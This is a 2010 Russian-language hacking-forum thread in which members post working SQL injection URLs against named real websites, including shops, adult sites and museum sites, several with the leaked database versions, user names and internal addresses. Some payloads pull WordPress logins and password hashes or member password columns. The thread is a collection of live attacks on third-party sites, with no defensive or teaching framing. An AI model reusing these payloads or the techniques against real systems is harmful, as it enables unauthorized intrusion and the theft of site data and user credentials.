HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 19.02.2010, 16:44
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

Исчо)


Код:
http://maximstroy.ru/catalog/ind.php?id=-1+union+select+1,2,3,4,5,6,concat(version(),0x3a,user(),0x3a,database()),8,9,10,11+--+
5.0.67-log:u72532@10.10.223.239:u72532_2

Код:
http://www.electro-sila.ru/board/ind.php?id_typ=-1+union+select+1,2,3,4,5,6,concat(version(),0x3a,user(),0x3a,database()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+--+
5.0.67-log:u29186@10.10.153.190:u29186_2

Последний раз редактировалось Seravin; 19.02.2010 в 16:47..
 
Ответить с цитированием

  #2  
Старый 19.02.2010, 17:19
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219

Репутация: 2274


По умолчанию

http://internetsexshop.ru/information/?id=-1+UNION+SELECT+1,2,3,TABLE_NAME,5,6,7,8,9,10,11,12 ,13+FROM+information_schema.tables--
 
Ответить с цитированием

  #3  
Старый 19.02.2010, 17:24
sqlinjector
Новичок
Регистрация: 31.12.2009
Сообщений: 19
Провел на форуме:
60679

Репутация: 10
По умолчанию

Бестолковый сайт
Код:
http://www.kkonsult.ru/print_document.php?doc_id=-42+union+select+1,2,3,group_concat%28column_name,0x3a+separator+0x0b%29,5,6,7+from+information_schema.columns+where+table_name=0x6B6B5F757365725F70726F66696C65--
 
Ответить с цитированием

  #4  
Старый 19.02.2010, 21:45
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

Ы_ы Брест интелектульный)))))) Интелектуалы мля!
Код:
http://www.ibrest.net/pnews/pgb.php,ru,?nws_id=-1))+union+select+1,concat(user(),0x3a,database(),0x3a,version()),3,4,5,6,7,8,9,10,11+--+&nwsrub=1
ibrestn_ibrestdb@localhost:ibrestn_ibrestdatabase: 5.0.32-Debian_7etch6-log
 
Ответить с цитированием

  #5  
Старый 20.02.2010, 05:40
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию

Услуги:
Цитата:
http://www.orangeville.ca/newsletters.php?id=14+union+select+concat_ws(0x3a, version(),database(),@@version_compile_os,user(),p assword)+from+users--+;-)
Цитата:
http://www.congreso.net/services/servicerecorddetail.php?id=29+and+null+union+selec t+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27,concat_ws(0x3a,version(),d atabase(),user(),@@version_compile_os),29--+
Цитата:
http://www.autoonline.com.ua/news/index.php?id=4370+order+by+9--+
как blind крутить!

гы дубли, спс Scipio, переменная не попадла в запрос, реакция на '='
Цитата:
http://topok.com.ua/services.php?id=22/**/and/**/(1,2)in(select/**/*/**/from(select/**/name_const(version(),1),name_const(version(),1))as/**/a)

Последний раз редактировалось Strilo4ka; 20.02.2010 в 16:22..
 
Ответить с цитированием

  #6  
Старый 20.02.2010, 20:20
IgAlex
Познающий
Регистрация: 17.11.2008
Сообщений: 48
Провел на форуме:
351316

Репутация: 71
По умолчанию

erotika-auktionen.de

Код:
http://www.erotika-auktionen.de/news.php?id=-1+union+all+select+1,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,3,4,5+--
version:5.0.51a-24+lenny2
database:usr_web130_1
user:web130@localhost

www.erotikzentrum24.de

Код:
http://www.erotikzentrum24.de/news.php?id=-1+union+all+select+1,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,3,4,5+--
version:5.0.51a-24+lenny2
database:usr_web131_1
user:web131@localhost
 
Ответить с цитированием

  #7  
Старый 20.02.2010, 05:05
Mr.Br0wn
Новичок
Регистрация: 26.10.2009
Сообщений: 17
Провел на форуме:
124258

Репутация: 27
По умолчанию

Код:
http://www.surveyquotes.co.uk/view-articles.php?id=7+and+1=0+union+select+1,concat_ws(0x3a,user_login,user_pass),3,4,5,6,7,8+from+wp_users--
 
Ответить с цитированием

  #8  
Старый 20.02.2010, 22:13
MenZon
Banned
Регистрация: 14.02.2010
Сообщений: 26
Провел на форуме:
156801

Репутация: 11
Отправить сообщение для MenZon с помощью ICQ
По умолчанию

www.vshoes.ru
Код:
http://vshoes.ru/catalog.php?catid=2&index=1&tovzvetint=202&tovartik=-78700'+union+select+concat_ws(0x3a,version(),user(),database(),@@version_compile_os)--+
Database Version: 4.1.22
Database name: k2_vshoesru
User name: k2_vshoesru@localhost
 
Ответить с цитированием

  #9  
Старый 20.02.2010, 23:53
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию

админкО /admin/ в robots.txt
ось win
mg=on
ко-во атрибутов 41
есть форум 300 пользователей зарегеных
pr 3 вроде

Цитата:
http://tennis-ukraine.com/index.php?p=players&id=-218+union+select+1,2,concat_ws(version(),database( ),user(),@@version_compile_os),'4',5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,29,30,31,32,33,34,35,36,37,38,39,40,41--+;-)
 
Ответить с цитированием

.museum
  #10  
Старый 21.02.2010, 00:38
0x0.Injector
Новичок
Регистрация: 20.02.2010
Сообщений: 2
Провел на форуме:
22576

Репутация: 23
По умолчанию .museum

1.museum
american.naturalhistory.museum - PR=4
SQL
Код:
http://american.naturalhistory.museum/ology/features/ologist/stiassny/question.php?id=1+and+1=0+union+all+select+1,version%28%29,database%28%29,4,5,6,user%28%29,8/*
version - 5.0.41-community-log
user - ology_admin@localhost
database - ology

member
Код:
http://american.naturalhistory.museum/ology/features/ologist/stiassny/question.php?id=1+and+1=0+union+all+select+1,concat_ws%280x3a,ADJ_PART_ID_REF,NOUN_PART_ID_REF,NAME_SUFFIX,PASSWORD,HINT_WORD_ID_REF,HINTWORD,MEMBER_CREATED,LAST_LOGIN,MEMBER_STATUS%29,PASSWORD,4,5,6,MEMBER_STATUS,8+from+member+limit+0,1/*

2.museum
santelmo.donostia.museum
SQL
Код:
http://www.santelmo.donostia.museum/eus/publicacionesdeexposicionesmasinfo.php?op=5&ver=todo&titulo=&autor=&anno=&id=1+and+1=1+union+all+select+1,2,3,version%28%29,database%28%29,user%28%29,7,8,9,10,11,12
version - 5.0.51a-3ubuntu5.5
user - bbdd_museode@localhost
database - santelmo
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ